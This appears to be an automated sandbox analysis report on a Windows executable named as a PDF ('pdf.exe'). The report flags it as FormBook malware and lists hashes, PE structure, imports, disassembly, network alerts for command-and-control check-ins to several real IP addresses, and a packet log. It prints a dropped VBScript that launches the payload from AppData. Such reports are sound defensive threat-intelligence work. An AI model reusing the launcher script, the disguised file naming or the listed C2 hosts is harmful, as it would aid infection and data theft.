                                                  SSDEEP:24576:Mtb20pkaCqT5TBWgNQ7au7/cTDUaoFGXMt4V0WB6A:1Vg5tQ7au7UTnMs5
                                                  MD5:8E38E2141423C1BDF6899EF2AAF078F8
                                                  SHA1:ECAA7E2BD0E59981891F6EC4C34C67EE32843D2D
                                                  SHA-256:FF964E11539853B46A4D4C0F9BBD111F4FDCE259EF470E88AE59802D82533B36
                                                  SHA-512:F1AA198ECFA67B35380867C4552A5E5EEDFB3A67E49EF121C2DE9A10BD8B00002CA15C66D90B89F20746FF8755CD2444B46CC5ADE521D15020B21E8D686E5803
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                  Process:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):270
                                                  Entropy (8bit):3.400605751158446
                                                  Encrypted:false
                                                  SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1q/NDQMnriIM8lfQVn:DsO+vNloRKQ1qFDQKmA2n
                                                  MD5:AE125A76B27EA014BDE1074A281B3482
                                                  SHA1:3C72BDF8164875C5A81A1D9B3B3429D5B947BFA3
                                                  SHA-256:C902128E212154F39AEA5F539416BE13757E69656FFEB87D5CC995513DB2531D
                                                  SHA-512:379C09BF3411A573869E4AAF6C1BC559C7F1434066B9EE0CAF5CAA02A5986539284EA72A39BCCD32B20BB07A8C40A01C2C639C4732871ECDE04CF23A2E68A418
                                                  Malicious:true
                                                  Preview (UTF-16LE, decoded):
                                                  Set WshShell = CreateObject("WScript.Shell")
                                                  WshShell.Run "C:\Users\jones\AppData\Local\retrofit\cunila.exe", 1
                                                  Set WshShell = Nothing
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.164870375096438
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:5674656777985-069688574654 pdf.exe
                                                  File size:1'189'888 bytes
                                                  MD5:8e38e2141423c1bdf6899ef2aaf078f8
                                                  SHA1:ecaa7e2bd0e59981891f6ec4c34c67ee32843d2d
                                                  SHA256:ff964e11539853b46a4d4c0f9bbd111f4fdce259ef470e88ae59802d82533b36
                                                  SHA512:f1aa198ecfa67b35380867c4552a5e5eedfb3a67e49ef121c2de9a10bd8b00002ca15c66d90b89f20746ff8755cd2444b46cc5ade521d15020b21e8d686e5803
                                                  SSDEEP:24576:Mtb20pkaCqT5TBWgNQ7au7/cTDUaoFGXMt4V0WB6A:1Vg5tQ7au7UTnMs5
                                                  TLSH:9045CF2363DE8365C3B25273BA257701AEBB7C2506B1F86B2FD4293DE930161521E673
                                                  Icon Hash:d38d8c83818d898d
                                                  Entrypoint:0x425f74
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x67353335 [Wed Nov 13 23:16:05 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                  Instruction
                                                  call 00007F47053929DFh
                                                  jmp 00007F47053859F4h
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F4705385B7Ah
                                                  cmp edi, eax
                                                  jc 00007F4705385EDEh
                                                  bt dword ptr [004C0158h], 01h
                                                  jnc 00007F4705385B79h
                                                  rep movsb
                                                  jmp 00007F4705385E8Ch
                                                  cmp ecx, 00000080h
                                                  jc 00007F4705385D44h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F4705385B80h
                                                  bt dword ptr [004BA370h], 01h
                                                  jc 00007F4705386050h
                                                  bt dword ptr [004C0158h], 00000000h
                                                  jnc 00007F4705385D1Dh
                                                  test edi, 00000003h
                                                  jne 00007F4705385D2Eh
                                                  test esi, 00000003h
                                                  jne 00007F4705385D0Dh
                                                  bt edi, 02h
                                                  jnc 00007F4705385B7Fh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F4705385B83h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F4705385BD5h
                                                  bt esi, 03h
                                                  jnc 00007F4705385C28h
                                                  movdqa xmm1, dqword ptr [esi+00h]
                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2012 UPD4 build 61030
                                                  • [RES] VS2012 UPD4 build 61030
                                                  • [LNK] VS2012 UPD4 build 61030
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x59684 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11e000 | 0x6c4c | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc | 0xc4000 | 0x59684 | 0x59800 | 9a7c4d92b0b81fc9167f097398c558ae | False | 0.9711614001396648 | data | 7.969652730856171 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x11e000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_ICON | 0xc4350 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                  RT_ICON | 0xc4478 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 4724 x 4724 px/m | English | Great Britain | 0.2849437148217636
                                                  RT_STRING | 0xc5520 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                  RT_STRING | 0xc5ab4 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                                  RT_STRING | 0xc6140 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                  RT_STRING | 0xc65d0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                  RT_STRING | 0xc6bcc | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                  RT_STRING | 0xc7228 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                  RT_STRING | 0xc7690 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                  RT_RCDATA | 0xc77e8 | 0x559e5 | data | | | 1.000330773639622
                                                  RT_GROUP_ICON | 0x11d1d0 | 0x14 | data | English | Great Britain | 1.2
                                                  RT_GROUP_ICON | 0x11d1e4 | 0x14 | data | English | Great Britain | 1.15
                                                  RT_VERSION | 0x11d1f8 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                                  RT_MANIFEST | 0x11d2d4 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                                                  DLL | Import
                                                  WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                  VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                  PSAPI.DLL | GetProcessMemoryInfo
                                                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dll | IsThemeActive
                                                  KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, 
SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not included in this export)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-19T03:56:33.741883+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49890 | 217.160.0.200 | 80 | TCP
2024-11-19T03:56:36.651652+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49903 | 217.160.0.200 | 80 | TCP
2024-11-19T03:56:39.430836+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49914 | 217.160.0.200 | 80 | TCP
2024-11-19T03:56:48.389553+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49961 | 203.161.46.205 | 80 | TCP
2024-11-19T03:56:50.917047+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49973 | 203.161.46.205 | 80 | TCP
2024-11-19T03:56:53.471522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49985 | 203.161.46.205 | 80 | TCP
2024-11-19T03:57:02.790158+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 91.226.30.3 | 80 | TCP
2024-11-19T03:57:04.996899+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 91.226.30.3 | 80 | TCP
2024-11-19T03:57:07.534889+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50018 | 91.226.30.3 | 80 | TCP
2024-11-19T03:57:16.067744+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 104.21.15.100 | 80 | TCP
2024-11-19T03:57:18.626444+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 104.21.15.100 | 80 | TCP
2024-11-19T03:57:21.584196+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 104.21.15.100 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 03:56:16.280985117 CET | 49815 | 80 | 192.168.2.4 | 103.21.221.4
Nov 19, 2024 03:56:16.286072969 CET | 80 | 49815 | 103.21.221.4 | 192.168.2.4
Nov 19, 2024 03:56:16.286181927 CET | 49815 | 80 | 192.168.2.4 | 103.21.221.4
Nov 19, 2024 03:56:16.294245005 CET | 49815 | 80 | 192.168.2.4 | 103.21.221.4
Nov 19, 2024 03:56:16.299093962 CET | 80 | 49815 | 103.21.221.4 | 192.168.2.4
Nov 19, 2024 03:56:17.406595945 CET | 80 | 49815 | 103.21.221.4 | 192.168.2.4
Nov 19, 2024 03:56:17.461932898 CET | 49815 | 80 | 192.168.2.4 | 103.21.221.4
Nov 19, 2024 03:56:17.598501921 CET | 80 | 49815 | 103.21.221.4 | 192.168.2.4
Nov 19, 2024 03:56:17.598675013 CET | 49815 | 80 | 192.168.2.4 | 103.21.221.4
Nov 19, 2024 03:56:17.600122929 CET | 49815 | 80 | 192.168.2.4 | 103.21.221.4
Nov 19, 2024 03:56:17.605210066 CET | 80 | 49815 | 103.21.221.4 | 192.168.2.4
Nov 19, 2024 03:56:32.671866894 CET | 49890 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:32.676954031 CET | 80 | 49890 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:32.677053928 CET | 49890 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:32.816982985 CET | 49890 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:32.822019100 CET | 80 | 49890 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:33.741810083 CET | 80 | 49890 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:33.741883039 CET | 49890 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:34.337110043 CET | 49890 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:34.342119932 CET | 80 | 49890 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:35.355415106 CET | 49903 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:35.360435963 CET | 80 | 49903 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:35.360635996 CET | 49903 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:35.374742031 CET | 49903 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:35.379793882 CET | 80 | 49903 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:36.647717953 CET | 80 | 49903 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:36.651652098 CET | 49903 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:36.883837938 CET | 49903 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:36.890270948 CET | 80 | 49903 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.902462959 CET | 49914 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:37.907344103 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.907418013 CET | 49914 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:37.921024084 CET | 49914 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:37.926291943 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926302910 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926311016 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926321983 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926341057 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926350117 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926357985 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926479101 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:37.926487923 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:39.430835962 CET | 49914 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:39.458240032 CET | 80 | 49914 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:39.458328009 CET | 49914 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:40.449944973 CET | 49927 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:40.456293106 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:40.457739115 CET | 49927 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:40.467340946 CET | 49927 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:40.473839045 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:41.740046024 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:41.740094900 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:41.740112066 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:41.740128040 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:41.740247965 CET | 49927 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:41.740284920 CET | 49927 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:42.013441086 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:42.013569117 CET | 49927 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:42.017210007 CET | 49927 | 80 | 192.168.2.4 | 217.160.0.200
Nov 19, 2024 03:56:42.023551941 CET | 80 | 49927 | 217.160.0.200 | 192.168.2.4
Nov 19, 2024 03:56:47.591120005 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:47.596069098 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:47.596173048 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:47.609901905 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:47.614811897 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389317989 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389386892 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389441967 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389549971 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389553070 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:48.389585972 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
